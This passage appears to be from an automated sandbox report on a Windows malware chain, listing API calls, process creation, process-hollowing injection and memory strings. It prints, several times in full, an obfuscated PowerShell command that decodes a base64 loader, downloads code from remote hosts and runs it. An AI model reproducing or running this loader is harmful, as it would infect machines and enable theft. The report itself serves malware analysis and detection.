                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10006580 FindFirstFileExA,12_2_10006580
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0040B477 FindFirstFileW,FindNextFileW,14_2_0040B477
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407357
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0041A8D8 memset,GetSystemInfo,14_2_0041A8D8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: CasPol.exe, 0000000C.00000002.3706884561.0000000000E7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                        Source: wscript.exe, 00000003.00000003.1293173297.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296945809.000000000319C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.000000000317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298085040.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293173297.0000000003176000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1295724945.0000000003190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1290712578.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.0000000003184000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3706884561.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 0000000A.00000002.1420334997.0000000006D70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_12-55124
                        Source: C:\Windows\SysWOW64\recover.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043B88D
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040BAE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041D0CF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004438F4 mov eax, dword ptr fs:[00000030h]12_2_004438F4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]12_2_10004AB4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,12_2_00411999
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00435398
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043B88D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434D6E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434F01 SetUnhandledExceptionFilter,12_2_00434F01
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
                        Source: Yara matchFile source: amsi32_3824.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi32_3824.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00418267
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory written: C:\Windows\SysWOW64\recover.exe base: 2ECF008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory written: C:\Windows\SysWOW64\recover.exe base: 8C5008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory written: C:\Windows\SysWOW64\recover.exe base: 3004008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004197D9 mouse_event,12_2_004197D9
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.batJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\nonordinary.vbs"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreakJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#b0#gu#cgby#ge#ywbp#g4#zwbz#c##pq#g#cc#d#b4#hq#lgbl#g0#bgbv#gw#cgbp#gc#zwbu#gk#cwbz#gk#awb0#ge#a#b0#g4#bwbz#gc#bgbp#gg#d#b0#ge#zqby#gc#a#b0#gk#dwby#gu#dgbv#gw#zqbj#gk#bgb5#gw#b#bh#gu#cgbl#hi#yqbl#hc#lw#w#dy#ng#v#dg#o##u#de#oq#x#c4#nq#0#di#lg#y#dc#mq#v#c8#ogbw#hq#d#bo#cc#ow#k#gi#yqby#gi#bwb0#gk#bgbl#c##pq#g#cq#d#bl#hi#cgbh#gm#aqbu#gc#cw#g#c0#cgbl#h##b#bh#gm#zq#g#cc#iw#n#cw#i##n#hq#jw#7#cq#bqbh#hm#cwbp#gu#cg#g#d0#i##n#gg#d#b0#h##og#v#c8#mq#w#dq#lg#x#dy#o##u#dc#lg#z#dg#lwb4#ge#bqbw#h##lwbz#hy#lwbf#e4#qwbs#fk#u#bu#ek#twbo#d##mq#u#go#c#bn#cc#ow#k#gu#cqb1#gk#dgbh#gw#dgb1#gw#yqby#c##pq#g#e4#zqb3#c0#twbi#go#zqbj#hq#i#bt#hk#cwb0#gu#bq#u#e4#zqb0#c4#vwbl#gi#qwbs#gk#zqbu#hq#ow#k#ge#ywbl#hq#bwbw#gg#zqbu#gu#d#bp#gq#aqbu#c##pq#g#cq#zqbx#hu#aqb2#ge#b#b2#hu#b#bh#hi#lgbe#g8#dwbu#gw#bwbh#gq#r#bh#hq#yq#o#cq#bqbh#hm#cwbp#gu#cg#p#ds#j#bn#ge#bgbp#gw#awbh#hi#yq#g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#ge#ywbl#hq#bwbw#gg#zqbu#gu#d#bp#gq#aqbu#ck#ow#k#fo#aqbt#gi#yqbi#hc#zqbh#g4#cw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#cq#yqb6#g8#d#bl#gq#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbf#e4#r##+#d4#jw#7#cq#zqbu#hq#zqby#g8#bg#g#d0#i##k#e0#yqbu#gk#b#br#ge#cgbh#c4#sqbu#gq#zqb4#e8#zg#o#cq#wgbp#g0#ygbh#gi#dwbl#ge#bgbz#ck#ow#k#gs#bgbp#hq#ywbo#gu#d##g#d0#i##k#e0#yqbu#gk#b#br#ge#cgbh#c4#sqbu#gq#zqb4#e8#zg#o#cq#yqb6#g8#d#bl#gq#kq#7#cq#zqbu#hq#zqby#g8#bg#g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gs#bgbp#hq#ywbo#gu#d##g#c0#zwb0#c##j#bl#g4#d#bl#hi#bwbu#ds#j#bl#g4#d#bl#hi#bwbu#c##kw#9#c##j#ba#gk#bqbi#ge#ygb3#gu#yqbu#hm#lgbm#gu#bgbn#hq#a##7#cq#bqbh#hq#a#bl#g0#yqb0#gk#ywbz#c##pq#g#cq#awbu#gk#d#bj#gg#zqb0#c##lq#g#cq#zqbu#hq#zqby#g8#bg#7#cq#yqbm#gy#bwbh#hi#z#bl#gq#i##9#c##j#bn#ge#bgbp#gw#awbh#hi#yq#u#fm#dqbi#hm#d#by#gk#bgbn#cg#j#bl#g4#d#bl#hi#bwbu#cw#i##k#g0#yqb0#gg#zqbt#ge#d#bp#gm#cw#p#ds#j#bj#g8#bqbl#gq#aqbl#g4#bgbl#hm#i##9#c##wwbt#hk#cwb0#gu#bq#u#em#bwbu#hy#zqby#hq#xq#6#do#rgby#g8#bqbc#ge#cwbl#dy#n#bt#hq#cgbp#g4#zw#o#cq#yqbm#gy#bwbh#hi#z#bl#gq#kq#7#cq#bwb1#hq#cgbl#ge#ywbo#hm#i##9#c##wwbt#hk#cwb0#gu#bq#u#fi#zqbm#gw#zqbj#hq#aqbv#g4#lgbb#hm#cwbl#g0#ygbs#hk#xq#6#do#t#bv#ge#z##o#cq#ywbv#g0#zqbk#gk#zqbu#g4#zqbz#ck#ow#k#hy#yqbs#gu#d#b1#gq#aqbu#ge#cgbp#ge#i##9#c##wwbk#g4#b#bp#gi#lgbj#e8#lgbi#g8#bqbl#f0#lgbh#gu#d#bn#gu#d#bo#g8#z##o#cc#vgbb#ek#jw#p#c4#sqbu#hy#bwbr#gu#k##k#g4#dqbs#gw#l##g#fs#bwbi#go#zqbj#hq#wwbd#f0#i#b##cg#j#bi#ge#cgbi#g8#d#bp#g4#zq#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#qwbh#hm#u#bv#gw#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#p#ck#'; $owjuxd = [system.text.encoding]::unicode.getstring([convert]::frombase64string($codigo.replace('#','a'))); invoke-expression $owjuxd"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#b0#gu#cgby#ge#ywbp#g4#zwbz#c##pq#g#cc#d#b4#hq#lgbl#g0#bgbv#gw#cgbp#gc#zwbu#gk#cwbz#gk#awb0#ge#a#b0#g4#bwbz#gc#bgbp#gg#d#b0#ge#zqby#gc#a#b0#gk#dwby#gu#dgbv#gw#zqbj#gk#bgb5#gw#b#bh#gu#cgbl#hi#yqbl#hc#lw#w#dy#ng#v#dg#o##u#de#oq#x#c4#nq#0#di#lg#y#dc#mq#v#c8#ogbw#hq#d#bo#cc#ow#k#gi#yqby#gi#bwb0#gk#bgbl#c##pq#g#cq#d#bl#hi#cgbh#gm#aqbu#gc#cw#g#c0#cgbl#h##b#bh#gm#zq#g#cc#iw#n#cw#i##n#hq#jw#7#cq#bqbh#hm#cwbp#gu#cg#g#d0#i##n#gg#d#b0#h##og#v#c8#mq#w#dq#lg#x#dy#o##u#dc#lg#z#dg#lwb4#ge#bqbw#h##lwbz#hy#lwbf#e4#qwbs#fk#u#bu#ek#twbo#d##mq#u#go#c#bn#cc#ow#k#gu#cqb1#gk#dgbh#gw#dgb1#gw#yqby#c##pq#g#e4#zqb3#c0#twbi#go#zqbj#hq#i#bt#hk#cwb0#gu#bq#u#e4#zqb0#c4#vwbl#gi#qwbs#gk#zqbu#hq#ow#k#ge#ywbl#hq#bwbw#gg#zqbu#gu#d#bp#gq#aqbu#c##pq#g#cq#zqbx#hu#aqb2#ge#b#b2#hu#b#bh#hi#lgbe#g8#dwbu#gw#bwbh#gq#r#bh#hq#yq#o#cq#bqbh#hm#cwbp#gu#cg#p#ds#j#bn#ge#bgbp#gw#awbh#hi#yq#g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#ge#ywbl#hq#bwbw#gg#zqbu#gu#d#bp#gq#aqbu#ck#ow#k#fo#aqbt#gi#yqbi#hc#zqbh#g4#cw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#cq#yqb6#g8#d#bl#gq#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbf#e4#r##+#d4#jw#7#cq#zqbu#hq#zqby#g8#bg#g#d0#i##k#e0#yqbu#gk#b#br#ge#cgbh#c4#sqbu#gq#zqb4#e8#zg#o#cq#wgbp#g0#ygbh#gi#dwbl#ge#bgbz#ck#ow#k#gs#bgbp#hq#ywbo#gu#d##g#d0#i##k#e0#yqbu#gk#b#br#ge#cgbh#c4#sqbu#gq#zqb4#e8#zg#o#cq#yqb6#g8#d#bl#gq#kq#7#cq#zqbu#hq#zqby#g8#bg#g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gs#bgbp#hq#ywbo#gu#d##g#c0#zwb0#c##j#bl#g4#d#bl#hi#bwbu#ds#j#bl#g4#d#bl#hi#bwbu#c##kw#9#c##j#ba#gk#bqbi#ge#ygb3#gu#yqbu#hm#lgbm#gu#bgbn#hq#a##7#cq#bqbh#hq#a#bl#g0#yqb0#gk#ywbz#c##pq#g#cq#awbu#gk#d#bj#gg#zqb0#c##lq#g#cq#zqbu#hq#zqby#g8#bg#7#cq#yqbm#gy#bwbh#hi#z#bl#gq#i##9#c##j#bn#ge#bgbp#gw#awbh#hi#yq#u#fm#dqbi#hm#d#by#gk#bgbn#cg#j#bl#g4#d#bl#hi#bwbu#cw#i##k#g0#yqb0#gg#zqbt#ge#d#bp#gm#cw#p#ds#j#bj#g8#bqbl#gq#aqbl#g4#bgbl#hm#i##9#c##wwbt#hk#cwb0#gu#bq#u#em#bwbu#hy#zqby#hq#xq#6#do#rgby#g8#bqbc#ge#cwbl#dy#n#bt#hq#cgbp#g4#zw#o#cq#yqbm#gy#bwbh#hi#z#bl#gq#kq#7#cq#bwb1#hq#cgbl#ge#ywbo#hm#i##9#c##wwbt#hk#cwb0#gu#bq#u#fi#zqbm#gw#zqbj#hq#aqbv#g4#lgbb#hm#cwbl#g0#ygbs#hk#xq#6#do#t#bv#ge#z##o#cq#ywbv#g0#zqbk#gk#zqbu#g4#zqbz#ck#ow#k#hy#yqbs#gu#d#b1#gq#aqbu#ge#cgbp#ge#i##9#c##wwbk#g4#b#bp#gi#lgbj#e8#lgbi#g8#bqbl#f0#lgbh#gu#d#bn#gu#d#bo#g8#z##o#cc#vgbb#ek#jw#p#c4#sqbu#hy#bwbr#gu#k##k#g4#dqbs#gw#l##g#fs#bwbi#go#zqbj#hq#wwbd#f0#i#b##cg#j#bi#ge#cgbi#g8#d#bp#g4#zq#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#qwbh#hm#u#bv#gw#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#s#cc#jw#p#ck#'; $owjuxd = [system.text.encoding]::unicode.getstring([convert]::frombase64string($codigo.replace('#','a'))); invoke-expression $owjuxd"Jump to behavior
                        Source: CasPol.exe, 0000000C.00000002.3706884561.0000000000E74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: CasPol.exe, 0000000C.00000002.3706884561.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3706884561.0000000000E7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: CasPol.exe, 0000000C.00000002.3706884561.0000000000E74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00435034 cpuid 12_2_00435034
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040F26B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004520E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00452097
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_0045217D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_0045220A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_0044844E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_0045245A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00452583
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_0045268A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452757
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_00448937
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00451E1F
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
